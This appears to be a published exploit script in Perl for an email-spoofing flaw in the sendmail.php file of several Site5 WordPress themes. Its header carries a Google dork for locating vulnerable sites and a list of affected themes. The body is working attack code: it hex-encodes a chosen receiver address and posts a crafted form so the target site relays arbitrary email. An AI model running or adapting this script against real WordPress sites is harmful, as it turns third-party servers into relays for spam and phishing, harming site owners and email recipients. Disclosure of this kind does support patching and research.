#!/usr/bin/perl # Exploit Title: Site5 Wordpress Themes - Email Spoofing # Date: 15.07.2012 # Exploit Author: @bwallHatesTwits # Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/) # Software Link: http://www.wpdiarytheme.com/ # Vendor Homepage: http://www.site5.com/ # Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/ # Google Dork: "Theme by Site5" -site5.com -site5.net -google.com # Version: Not Documented # Tested on: Linux 3.2 use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common qw{ POST }; #Change this to the root of the Wordpress my $wordpress = 'http://localhost/wordpress/'; #Change this to the theme being exploited #Known Vulnerable Themes: diary, simploblack, simplo, journalcrunch, boldy, webfolio my $theme = 'diary'; my $url = $wordpress.'wp-content/themes/'.$theme.'/sendmail.php'; #Name shows up in the topic of the email (Website contact message from name) my $name ='Proof of Concept'; #Sender email address my $email = 'sender@mail.com'; #Content of the email my $comment = 'Email content'; #Receiver email address my $receiver = 'receiver@mail.com'; $receiver =~ s/(.)/sprintf("%x",ord($1))/eg; my $ua = LWP::UserAgent->new(); my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] ); print "Sending request to $url\n"; my $content = $ua->request($request)->as_string(); print $content; print "\nDone\nFollow \@BallastSec on Twitter\n";